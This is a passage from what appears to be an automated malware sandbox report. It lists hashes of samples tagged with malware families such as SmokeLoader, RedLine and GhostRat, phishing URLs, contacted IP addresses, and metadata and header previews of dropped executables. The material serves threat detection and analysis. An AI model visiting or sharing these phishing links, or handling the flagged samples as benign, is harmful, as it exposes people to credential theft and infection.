                                                              https://sidbm.net/officialweb/?russell.sinco@corespecialty.comGet hashmaliciousHTMLPhisherBrowse
                                                              • 34.193.43.67
                                                              641ce2409374cfc1d1e5ffcb68c0f53239453da0a60bc6021a228d5c0eed5204.exeGet hashmaliciousBdaejecBrowse
                                                              • 44.221.84.105
                                                              62e622661a968df60428fb599c2008c35b47079cf1d9cd8be611f671a9b21f4c.exeGet hashmaliciousBdaejec, LokibotBrowse
                                                              • 44.221.84.105
                                                              5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                              • 44.221.84.105
                                                              5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                              • 44.221.84.105
                                                              58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                              • 44.221.84.105
                                                              https://rb.gy/ExNW8QGet hashmaliciousUnknownBrowse
                                                              • 18.205.211.225
                                                              weH771UOWv.exeGet hashmaliciousSalityBrowse
                                                              • 44.221.84.105
                                                              56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exeGet hashmaliciousBdaejec, RedLineBrowse
                                                              • 44.221.84.105
                                                              CLOUDFLARENETUShttps://sidbm.net/officialweb/?russell.sinco@corespecialty.comGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.25.14
                                                              611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeGet hashmaliciousBdaejec, PrivateLoaderBrowse
                                                              • 172.67.133.215
                                                              https://forms.office.com/r/MbTXnrrxDYGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.24.14
                                                              5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                              • 188.114.96.3
                                                              http://pub-18c0b230f8f2453bbc80499dbfd675b4.r2.devGet hashmaliciousUnknownBrowse
                                                              • 104.17.247.203
                                                              Millich Law.pdfGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.18.95.41
                                                              https://mfgvendor.feeco.com:8081/Get hashmaliciousUnknownBrowse
                                                              • 104.17.25.14
                                                              https://mfgvendor.feeco.com:8081/Get hashmaliciousUnknownBrowse
                                                              • 104.17.25.14
                                                              https://rb.gy/ExNW8QGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              securedoc_20240724T165428.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                              • 104.17.25.14
                                                              AMAZON-02UShttps://sidbm.net/officialweb/?russell.sinco@corespecialty.comGet hashmaliciousHTMLPhisherBrowse
                                                              • 18.239.36.8
                                                              https://forms.office.com/r/MbTXnrrxDYGet hashmaliciousHTMLPhisherBrowse
                                                              • 108.156.2.59
                                                              https://rb.gy/ExNW8QGet hashmaliciousUnknownBrowse
                                                              • 18.238.243.41
                                                              weH771UOWv.exeGet hashmaliciousSalityBrowse
                                                              • 54.244.188.177
                                                              https://tsgfusion.comGet hashmaliciousUnknownBrowse
                                                              • 18.245.218.47
                                                              securedoc_20240724T165428.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                              • 108.156.39.24
                                                              http://link.mail.beehiiv.com/ss/c/u001.6C5fb2jgNhK_7sih4vM3VdXQvrvE9q5c82BetVgY4Tn_3vzvYophOo2JT7xoV-WSpIvcZOkxKRXavgDLqT8WDs81Kxwhn4ndaTj0SIW8pbE34PI3c8z85y8KF4b-3ctNBArb85FAtL-FvZ40umZH9aQETjMP7rTEiG1euALUwnOXxEOVey2ATbLesbQR6xxXmVQHnmd4pAMEpmvli0DXS3xWhmye0azQAc3gRlzrGWVUMzqfQog2yJQHz6Mdmf6a4nCgejh2JKgdwU-dC7d7RpcWEcgULfqQmicxg_xKRYc1aJrR3j1E3jT9fZxZO7WhDsQCbeMl8Mpj69s5RbxkO_huRS08Z3pfl78-scr41jA/47y/YxEtkvUcQDyArHo9NWTE1A/h6/h001.EMfOFVR5jhkE5RSbP1E9Z3FDv6QlJukJxLDJqd6igsM#DB87@OFSOPTICS.COMGet hashmaliciousHTMLPhisherBrowse
                                                              • 18.239.83.108
                                                              https://www.dropbox.com/l/scl/AAAGZgqGD2VsOM3BmcwwRTtQakzHTKGjOQQGet hashmaliciousUnknownBrowse
                                                              • 18.239.36.78
                                                              http://myuhnj.orgGet hashmaliciousUnknownBrowse
                                                              • 13.227.219.91
                                                              KfxEYxBsJm.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                              • 65.0.21.192
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              37f463bf4616ecd445d4a1937da06e1963D7B37217BAD05463192BD2F5E39A4AC23FF21C52CD27BF541780D29CF77C7F.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                              • 172.67.132.113
                                                              • 172.232.25.148
                                                              XEV5ucEWu7.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.132.113
                                                              • 172.232.25.148
                                                              o7Da7jGSSj.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.132.113
                                                              • 172.232.25.148
                                                              qGJBgGtR7e.exeGet hashmaliciousGh0stCringe, GhostRat, Mimikatz, RunningRATBrowse
                                                              • 172.67.132.113
                                                              • 172.232.25.148
                                                              5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                              • 172.67.132.113
                                                              • 172.232.25.148
                                                              #U7b2c#U9646#U6279#U6b21#U8868#U683c.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.132.113
                                                              • 172.232.25.148
                                                              VaajyQsbTV.exeGet hashmaliciousGhostRat, NitolBrowse
                                                              • 172.67.132.113
                                                              • 172.232.25.148
                                                              4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                              • 172.67.132.113
                                                              • 172.232.25.148
                                                              af0b876a436452a6e998fc622493aaa4553bcc53864d66a6a6d5d476a85902eb_dump1.exeGet hashmaliciousNanocore, RemcosBrowse
                                                              • 172.67.132.113
                                                              • 172.232.25.148
                                                              44112B6D303C7DF1528B55525872FEF0F08DE8C2A467F8E4D3B820F634F1F2C2.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                              • 172.67.132.113
                                                              • 172.232.25.148
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Users\user\AppData\Local\Temp\MDSxhU.exe63D7B37217BAD05463192BD2F5E39A4AC23FF21C52CD27BF541780D29CF77C7F.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                                641ce2409374cfc1d1e5ffcb68c0f53239453da0a60bc6021a228d5c0eed5204.exeGet hashmaliciousBdaejecBrowse
                                                                  62e622661a968df60428fb599c2008c35b47079cf1d9cd8be611f671a9b21f4c.exeGet hashmaliciousBdaejec, LokibotBrowse
                                                                    611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeGet hashmaliciousBdaejec, PrivateLoaderBrowse
                                                                      5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                                        5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                                          58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                                            5673773206126F12F4692E91C084B927357D9CF5FA3D5C312D89C9942B5C90FE.exeGet hashmaliciousBdaejec, RedLineBrowse
                                                                              56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exeGet hashmaliciousBdaejec, RedLineBrowse
                                                                                54E3EE54FAC434E25C03DED56A4680F1EA40A245D657440AC9C51BE7F27EF656.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):19456
                                                                                  Entropy (8bit):6.590305775549518
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:1FESAXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:14QGPL4vzZq2o9W7GsxBbPr
                                                                                  MD5:73F5EE347E908BC0022C84BDBF34791F
                                                                                  SHA1:6DFC6AFF58CD38C7F6C0A3FA4A6B291F26853F4A
                                                                                  SHA-256:07463AF7FFD3139B34E17168E9CB45DF5A021C22CD18C954E48D7EE6449D9072
                                                                                  SHA-512:2F090E22FA24CB48F7CFD80A8B7556BCD918DEDECB5DD8A5BB7CF8DCA8D4852C47982A8005C0D1689528D3DC1782F8BA16B2A9CAF56A79B2DDE7D5BC3194DF2C
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:low
                                                                                  Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2389504
                                                                                  Entropy (8bit):6.731349296928716
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                                                                  MD5:F65D1CDDF2BE1E6AC7DD5EA91415D38B
                                                                                  SHA1:6650DF54870A554239C75E46C90FD91166C17866
                                                                                  SHA-256:23FC21AEEED396465F91D2ACE4FDE222BD0BDEAF486D5958F074F4363AECAB3F
                                                                                  SHA-512:E9F066CD3D05205AA1AD6A6BCD75000C1F7CAB80CDDC84F383E209F326778EFF634E36D3299563861946F9F9BB2E8CA26C6596C3F01E5D903DDA202BA915EDB9
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):31744
                                                                                  Entropy (8bit):6.366817401791629
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:uWQ3655Kv1X/qY1MSdM5QGPL4vzZq2o9W7GsxBbPr:uHqaNrFdMuGCq2iW7z
                                                                                  MD5:EAE4AEAAC4BC3B33B593B3458990C839
                                                                                  SHA1:94A248F61A577D6C6B4090FB13584B755F0E7E8C
                                                                                  SHA-256:6D092B5C13B54A6473D47FC2CA46E7FDAB4D8E6EE272EFB56697D36D0ADAF806
                                                                                  SHA-512:A6E6DE266F292555A96023FFB558065CD95C5841EB6EAF6AF577AED690923F90F1025985D9E07055CE2B043E6CC10CFC0029CDCAE42A5EEE532CB0349FA3E41D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):65536
                                                                                  Entropy (8bit):1.091070179751811
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Rj8L/oYphw64f0BU/cmOjk9bZzuiFTZ24IO8VZG:C3pivMBU/ojUzuiFTY4IO8K
                                                                                  MD5:D2CD737459E89410F6402DD20FA7FB00
                                                                                  SHA1:42E516491CDA9D566A34E8D9CAEE869BD03A1233
                                                                                  SHA-256:7FBB5E68E5C79D164E8404BC73E38BA1D81C8A108FB156381531E96A633BAD1C
                                                                                  SHA-512:AA8F0101AA340F296E54A2F13F5FFD2830A254F598596CB4A63A98DD5B7268887722D479FE2728FCF02DCC41A414189CA1E4492362FCE13A06B06D1E44425FC7
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.0.8.7.8.7.3.7.9.9.2.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.0.8.7.9.5.3.7.9.9.1.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.d.5.1.b.a.5.-.6.7.1.7.-.4.d.2.c.-.a.9.d.d.-.5.1.6.b.e.4.b.8.7.7.6.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.b.a.d.c.b.c.-.a.5.1.d.-.4.5.0.8.-.b.c.0.b.-.6.a.4.1.5.6.5.5.f.1.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.6.5.B.D.7.E.4.9.F.E.2.9.2.7.4.8.F.0.C.5.0.4.D.C.B.E.F.D.B.0.A.D.8.6.E.6.9.C.8.3.4.9.D.7.2.5.3.D.0.E.9.5.E.B.F.1.B.F.0.1.1.0.B.0.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.8.c.-.0.0.0.1.-.0.0.1.4.-.e.4.7.e.-.b.3.c.1.d.e.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.a.c.6.1.1.1.0.7.a.7.0.9.2.6.c.9.b.f.1.d.4.0.3.b.b.7.0.7.d.b.6.0.0.0.0.0.9.0.4.!.0.0.0.0.b.a.d.7.9.f.b.2.e.7.9.f.1.2.f.e.
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):65536
                                                                                  Entropy (8bit):0.9758237409892532
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:oUCbrQi0BjYZb8djUfpXzuiFTZ24IO80j:arQpBjYZujqzuiFTY4IO8K
                                                                                  MD5:7EA746301440C166C2E9261148763E83
                                                                                  SHA1:D6D167C6DB0D345A897B29AF42E243C210BCE3DA
                                                                                  SHA-256:11CCCA1052FA0BBFDF82C30DC09FFECE5BF252D433F74257857E2F3D08BE36EB
                                                                                  SHA-512:C71D9F6F4AFDD92EF0E0BD9701C192E9A55340D7C8193B3BCBB48957D10A2A0FF1F6E38E6BFA5CC2E4B61DEE2076769289594CA12D1EDE3AC923038C778DA40F
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.0.8.8.0.0.6.1.9.4.2.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.0.8.8.0.1.0.1.0.0.4.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.6.e.d.3.d.0.-.f.b.7.6.-.4.6.d.e.-.a.6.1.2.-.0.6.b.5.5.e.9.9.f.8.8.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.b.f.1.7.5.c.-.9.0.7.d.-.4.5.1.7.-.a.8.a.4.-.a.d.5.5.5.9.c.8.7.9.e.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.D.S.x.h.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.3.c.-.0.0.0.1.-.0.0.1.4.-.c.c.b.0.-.d.4.c.1.d.e.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.4.4.2.c.9.6.9.7.d.6.6.3.e.8.1.7.e.8.2.7.6.d.0.3.6.d.4.7.1.9.1.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.M.D.S.x.h.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Mini DuMP crash report, 14 streams, Wed Jul 24 15:33:13 2024, 0x1205a4 type
                                                                                  Category:dropped
                                                                                  Size (bytes):137560
                                                                                  Entropy (8bit):1.8785319455263483
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:szI/F7/tj418gLGpkz9fNMt+ZYmZbYbxDqu+GZ2XBSKpYslgW:szI/NVj4egLGpyZNMOpZbYbxDyGZqAr
                                                                                  MD5:F7A3B42069A0354CC2904A9C93039E2D
                                                                                  SHA1:E0D51F2A7C86277720A59F101F92F2CAE8B614F3
                                                                                  SHA-256:113DE17932DEC37E2E4AEC292EC76BA034F4DB2F9D365A612C3C6DCE21533BC5
                                                                                  SHA-512:20A181714ADA3378FB639C8D52D84EA14C5E0009E3D2B37D87AA3B8EFC7A9CB39B97764CDCCF364A2F6660D06984657438139AD1A6B3E177ED372A51F65547A5
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:MDMP..a..... ..........f............D...............L.......T...XQ..........T.......8...........T............P..H............#...........$..............................................................................eJ.......%......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):8622
                                                                                  Entropy (8bit):3.7246822043559886
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:R6l7wVeJeln6S6TEb6YNvSU9QpgmfPqgeVnprx89bRysf47m:R6lXJs6VEb6YlSU9QpgmfCnVERxfZ
                                                                                  MD5:3C89D4C036D281262F3EC4AA230DE555
                                                                                  SHA1:C7A50ED29E69DD491CD3618B657A44074308E9F5
                                                                                  SHA-256:7F3BDF5EAD8BB6FC0CB816300BF6F1E69E596A3E354D346676F05007A1747B75
                                                                                  SHA-512:3897B488A4F4280D200AE89AE0668875C5E9C6EFAC5408EDC039A66C6CD1ED50BDE0F72F5553CA68DECE3A1CE720EB940772545B3B0150B31B6C8C661BF2C39B
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.1.2.<./.P.i.
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):4937
                                                                                  Entropy (8bit):4.647620554918031
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cvIwWl8zsIJg77aI9EC2WpW8VYHYm8M4J3N5htFB+q8h3SOGjC680j0yd:uIjfOI7aCX7VPJ3nzy3OjCJ0j0yd
                                                                                  MD5:611A63BC300BD1E17C1E0A1E326552D1
                                                                                  SHA1:FAAC00774F70F81C04AB32C60963A5FC8DEFCB83
                                                                                  SHA-256:325539407F1070B3058C354921C6E33E67547ADBA631CE5677835D04C6963BF2
                                                                                  SHA-512:739422C2F1556A20BCB422CBA0C4CF9F171614B28B449B56BF2CC647587A5753EEFA17A19B9DA79EB53FC88549EA25084BA1D9202B779FA0691ADCF08E3B0CD2
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425195" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 24 15:33:20 2024, 0x1205a4 type
                                                                                  Category:dropped
                                                                                  Size (bytes):144930
                                                                                  Entropy (8bit):1.8107438977077048
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:RPcg9tKAyzeHpVTuo2C0rc9gcXSfxdKUDrBRYs2yMJjrM9smiOc:RPcg9ANeHpVTuoPNzazKU5RYs2VrqR
                                                                                  MD5:0844B96EC4CA1770391CDD933FEFAC17
                                                                                  SHA1:B7A2F582883D25D91D2D110A6D71D17B1C360063
                                                                                  SHA-256:7BA96F1E54A668B90700CD730E832703958D73B9CCCDC2E9575339D91A8CEED8
                                                                                  SHA-512:8CD1A92430871921B5EA5ABEBB36E266068FC5DE8C3AA4EE992E00F5429F373A8B30241DF17EDA72F319BFACD68196504D6E4CA23E5A998C7B798096D079A172
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:MDMP..a..... ..........f............D...............X...........$ ..........|O..........`.......8...........T...........H;.............. !...........#..............................................................................eJ.......#......GenuineIntel............T.......<......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):8382
                                                                                  Entropy (8bit):3.707392261294824
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:R6l7wVeJN76izge6YelV6KiSUTgmfmp9pDG89bJlsfIDm:R6lXJR6+6Yu6wUTgmfmp3J+fB
                                                                                  MD5:994B554F25E23DA2B803CB53B4C23168
                                                                                  SHA1:1E02FDB595A439084F86217DE6BD9BC365EE1A90
                                                                                  SHA-256:8E3C5BE85921862171B30FED8457B04EF1237D539439E5E9D5E5DBDADA85A178
                                                                                  SHA-512:CF3DABD87DC670F89297A7088D5C0CF87C8BF58C8C7C9D886F29A26B913FF31042C8F8E2FFB4CC301516E92D38D70000934223D453CBB188324860986FF25D78
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.7.6.<./.P.i.
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):4551
                                                                                  Entropy (8bit):4.460312060209717
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cvIwWl8zsZJg77aI9EC2WpW8VYpYm8M4JwOFvG+q8G5tAguYd:uIjfrI7aCX7VNJVGttAguYd
                                                                                  MD5:B720FAD4C724AD81D7795468EF035A65
                                                                                  SHA1:544CF20E1CF6BEBEBF26ACE17732E5ECFA9FE654
                                                                                  SHA-256:932D181A012ADD2A8DEAE2C2A3404C0705C69244A4E425ECBD5CC26369A9BE7D
